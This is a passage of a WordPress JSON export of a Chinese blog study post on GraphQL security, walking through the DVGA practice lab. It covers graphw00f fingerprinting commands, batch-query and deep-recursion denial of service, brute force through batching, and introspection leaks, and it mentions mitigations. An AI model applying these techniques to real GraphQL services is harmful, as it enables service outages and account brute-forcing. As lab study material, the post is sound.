title=\"GraphQL\u5b89\u5168\u6307\u5317\">GraphQL\u5b89\u5168\u6307\u5317<\/a><\/p>\n<hr \/>\n<h4>3.\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/h4>\n<p>\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u4e3b\u8981\u4f53\u73b0\u5728<code>GraphQL<\/code>\u5bf9\u8c61\u95f4\u5305\u542b\u7ec4\u5408\u7684\u5d4c\u5957\u5173\u7cfb\uff0c\u5982\u679c\u4e0d\u5bf9\u5d4c\u5957\u6df1\u5ea6\u8fdb\u884c\u9650\u5236\uff0c\u5c31\u4f1a\u88ab\u653b\u51fb\u8005\u5229\u7528\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/p>\n<hr \/>\n<h4>4.DVGA \u9776\u573a<\/h4>\n<h5>\uff081\uff09graphw00f<\/h5>\n<blockquote>\n  graphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint.\n<\/blockquote>\n<p><code>python main.py -d -t <a href=\"http:\/\/ip\">http:\/\/ip<\/a><\/code>\u8fd9\u4e2a\u4e3b\u8981\u662f\u53bb\u904d\u5386 detect\uff0c\u5982\u679c\u786e\u5b9e\u4f7f\u7528\u4e86<code>GraphQL<\/code>\u4f1a\u7ed9\u51fa\u8def\u5f84<\/p>\n<p><code>python main.py -f -t <a href=\"http:\/\/ip\/{graphql\">http:\/\/ip\/{graphql<\/a>}<\/code>\u8fd9\u4e2a\u5c31\u662f\u628a\u4e0a\u4e00\u4e2a\u5f97\u5230\u7684\u8def\u5f84\u8fdb\u884c\u6307\u7eb9\u8bc6\u522b<\/p>\n<blockquote>\n  Point graphw00f at DVGA to figure out what technology it&#8217;s running.\n<\/blockquote>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-6-1024x125.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-6-1024x125.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u94fe\u63a5\u91cc\u4f1a\u7ed9\u51fa\u5f53\u524d<code>Engine<\/code>\u7684 Security Considerations \u4f5c\u4e3a\u53c2\u8003<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-7-1024x261.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-7-1024x261.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<h4>(2)Batch Query Attack<\/h4>\n<blockquote>\n  GraphQL supports Request Batching. Batched requests are processed one after the other by GraphQL, which makes it a good candidate for Denial of Service attacks, as well as other attacks <strong>such as Brute Force and Enumeration<\/strong>.<br>\n  If a resource intensive GraphQL query is identified, an attacker may leverage batch processing to call the query and potentially overwhelm the service for a prolonged period of time.<br>\n  The query <strong>systemUpdate<\/strong> seems to be taking a long time to complete, and can be used to overwhelm the server by batching a system update request query.\n<\/blockquote>\n<p>\u8fd9\u4e2a\u5176\u5b9e\u5f88\u5bb9\u6613\u7406\u89e3\uff0c<code>GraphQL<\/code>\u652f\u6301<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.apollographql.com\/blog\/apollo-client\/performance\/query-batching\/\" title=\"\u6279\u5904\u7406\u67e5\u8be2\">\u6279\u5904\u7406\u67e5\u8be2<\/a>\uff0c\u53ef\u4ee5\u5728\u4e00\u4e2a<code>POST<\/code>\u7684\u8bf7\u6c42\u4e0b\u9762\u53d1\u9001\u591a\u4e2a\u67e5\u8be2\uff0c\u8fd9\u6837\u5c31\u53ef\u80fd\u4f1a\u5bfc\u81f4\u51fa\u73b0\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u548c\u66b4\u529b\u7834\u89e3\uff0c\u6bd4\u5982\u7ed9\u51fa\u7684<code>systemUpdate<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-8-1024x399.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-8-1024x399.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u53ef\u4ee5\u60f3\u8c61\u5230\u5982\u679c\u4e00\u6b21\u6027\u53d1\u9001\u591a\u4e2a<code>systemUpdate<\/code>\u8fdb\u884c\u6279\u5904\u7406\u65f6\u8fd4\u56de\u54cd\u5e94\u5305\u9700\u8981\u591a\u5c11\u65f6\u95f4<\/p>\n<p>\u540c\u6837\u7684\uff0c\u5982\u679c\u5bf9\u4e8e\u7528\u6237\u767b\u5f55\u7b49\u9700\u8981\u8eab\u4efd\u9a8c\u8bc1\u9274\u6743\u7684\u64cd\u4f5c\u6ca1\u6709\u8fdb\u884c\u6b21\u6570\u9650\u5236\uff0c\u5f88\u5bb9\u6613\u9020\u6210\u66b4\u529b\u7834\u89e3\uff0c\u56e0\u4e3a<code>GraphQL<\/code>\u7684\u6279\u5904\u7406\u4f1a\u628a\u8fd9\u6837\u7684\u8bf7\u6c42\u5f53\u6210\u6b63\u5e38\u7684\u64cd\u4f5c\uff0c\u4e5f\u4e0d\u4f1a\u9020\u6210\u8bf7\u6c42\u65f6\u95f4\u7684\u500d\u589e<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-9-1024x511.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-9-1024x511.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<h4>(3)Deep Recursion Query Attack<\/h4>\n<blockquote>\n  In GraphQL, when types reference eachother, <strong>it is often possible to build a circular query that grows exponentially to a point it could bring the server down to its knees<\/strong>. Countermeasures such as <strong>max_depth<\/strong> can help mitigate these types of attacks.<br><\/blockquote>\n<p>\u5f53\u67e5\u8be2\u51fa\u73b0\u4e92\u76f8\u5f15\u7528\u5d4c\u5957\u65f6\uff0c\u53ef\u80fd\u4f1a\u51fa\u73b0\u6df1\u5ea6\u9012\u5f52\u67e5\u8be2\u653b\u51fb\uff0c\u5f53\u5d4c\u5957\u5c42\u6570\u8db3\u591f\u591a\u65f6\uff0c\u5c31\u4f1a\u5f15\u8d77\u670d\u52a1\u5668\u7684\u5d29\u6e83<\/p>\n<p>\u907f\u514d\u6b64\u95ee\u9898\u6211\u4eec\u9700\u8981\u5728<code>GraphQL<\/code>\u670d\u52a1\u5668\u4e0a\u9650\u5236\u67e5\u8be2\u6df1\u5ea6\uff0c\u540c\u65f6\u5728\u8bbe\u8ba1<code>GraphQL<\/code>\u63a5\u53e3\u65f6\u5e94\u5c3d\u91cf\u907f\u514d\u51fa\u73b0\u6b64\u7c7b\u95ee\u9898<\/p>\n<h4>(4)Resource Intensive Query Attack<\/h4>\n<blockquote>\n  Sometimes, certain queries may be computationally more expensive than others. A query may include certain fields that would trigger more complex backend logic in order to fulfill the query resolution. As attackers, we can abuse it by calling these actions frequently in order to cause resource exhaustion.\n<\/blockquote>\n<p>\u8fd9\u4e2a\u5c31\u50cf\u521a\u624d\u6d4b\u8bd5\u7684<code>systemUpdate<\/code>\uff0c\u8fd9\u79cd\u67e5\u8be2\u4f1a\u89e6\u53d1\u66f4\u590d\u6742\u7684\u540e\u7aef\u903b\u8f91\u4ee5\u5b9e\u73b0\u67e5\u8be2\u89e3\u6790\uff0c\u5982\u679c\u591a\u6b21\u8bf7\u6c42\u5c31\u4f1a\u9020\u6210\u8d44\u6e90\u8017\u5c3d\uff1b\u7f13\u89e3\u63aa\u65bd\u5c31\u662f\u5229\u7528<code>Query Cost Analysis<\/code>\uff0c\u901a\u8fc7\u8bbe\u7f6e\u4e00\u4e2a<code>upper threshold<\/code>\u6765\u62d2\u7edd\u9ad8\u989d\u8d44\u6e90\u6d88\u8017\u7684\u67e5\u8be2\u6216\u662f\u907f\u514d\u5728\u540c\u4e00\u65f6\u95f4\u5185\u6709\u91cd\u590d\u7684\u7c7b\u4f3c\u8bf7\u6c42<\/p>\n<h4>(5)Information Disclosure<\/h4>\n<p>\u5185\u7701\u67e5\u8be2\u5728\u521a\u521a\u7684 CTF \u6bd4\u8d5b\u9898\u76ee\u91cc\u5df2\u7ecf\u89c1\u5230\u4e86\uff0c\u53ef\u4ee5\u5c06\u8fd4\u56de\u7ed3\u679c\u7c98\u8d34\u5230 GraphiQL \u91cc\u8fdb\u884c\u53ef\u89c6\u5316\u7684\u67e5\u770b<\/p>\n<p>\u9776\u573a\u91cc\u8fd8\u63d0\u5230\u4e86\u4e00\u79cd\u4fe1\u606f\u6cc4\u6f0f\u662f<code>GraphQL Field Suggestions<\/code>\uff0c\u8fd9\u4e2a\u4e3b\u8981\u662f\u7528\u5728\u5f53\u5185\u7701\u67e5\u8be2\u4e0d\u88ab\u5141\u8bb8\u65f6\uff0c\u53ef\u4ee5\u8f93\u5165\u4e00\u4e2a\u9519\u8bef\u7684\u5b57\u6bb5\uff0c\u7136\u540e<code>GraphQL<\/code>\u4f1a\u8fd4\u56de\u76f8\u4f3c\u7684\u5b57\u6bb5\uff1b\u8fd9\u4e2a\u53ef\u53d1\u6325\u7684\u7a7a\u95f4\u5e94\u8be5\u4e0d\u662f\u5f88\u5927\ud83e\udd14<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-10-1024x492.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-10-1024x492.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<h4>(6)Code Execution &amp;&amp; Injection<\/h4>\n<p>\u4ee3\u7801\u6267\u884c\u548c\u6ce8\u5165\u8fd9\u4e24\u90e8\u5206\u5728\u771f\u5b9e\u4e1a\u52a1\u73af\u5883\u4e2d\u5e94\u8be5\u4e0d\u4f1a\u9047\u5230\uff0c\u5e94\u8be5\u662f\u9776\u573a\u63d0\u4f9b\u7684\u7279\u6709\u73af\u5883\uff0c\u53ef\u4ee5\u9002\u5f53\u7684\u73a9\u4e00\u73a9<\/p>\n<p>\u5177\u4f53\u7684\u53ef\u4ee5\u53c2\u8003\u4ee5\u4e0b\u4e24\u7bc7\u6587\u7ae0\uff1a<\/p>\n<ul><li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/zhuanlan.zhihu.com\/p\/390876937\" title=\"\u3010\u5b89\u5168\u8bb0\u5f55\u3011\u73a9\u8f6cGraphQL - DVGA\u9776\u573a\uff08\u4e0a\uff09\">\u3010\u5b89\u5168\u8bb0\u5f55\u3011\u73a9\u8f6cGraphQL &#8211; DVGA\u9776\u573a\uff08\u4e0a\uff09<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/zhuanlan.zhihu.com\/p\/391552292\" title=\"\u3010\u5b89\u5168\u8bb0\u5f55\u3011\u73a9\u8f6cGraphQL - DVGA\u9776\u573a\uff08\u4e0b\uff09\">\u3010\u5b89\u5168\u8bb0\u5f55\u3011\u73a9\u8f6cGraphQL &#8211; DVGA\u9776\u573a\uff08\u4e0b\uff09<\/a><\/li>\n<\/ul>","protected":false},"excerpt":{"rendered":"\u53c2\u8003\u6587\u7ae0\uff1a \u53d1\u73b0GraphQL\u7aef\u70b9\u548cSQL\u6ce8\u5165\u6f0f\u6d1e \u73a9\u8f6cgraphQL GraphQL\uff08\u4e00\uff09\u57fa\u7840\u4ecb\u7ecd\u53ca\u5e94\u7528\u793a\u4f8b [&hellip;]","protected":false},"author":1,"featured_media":366,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[27,26],"tags":[28],"class_list":["post-364","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-graphql","category-study","tag-graphql"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1.webp?fit=2000%2C1000","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/364","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=364"}],"version-history":[{"count":14,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/364\/revisions"}],"predecessor-version":[{"id":452,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/364\/revisions\/452"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/366"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=364"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}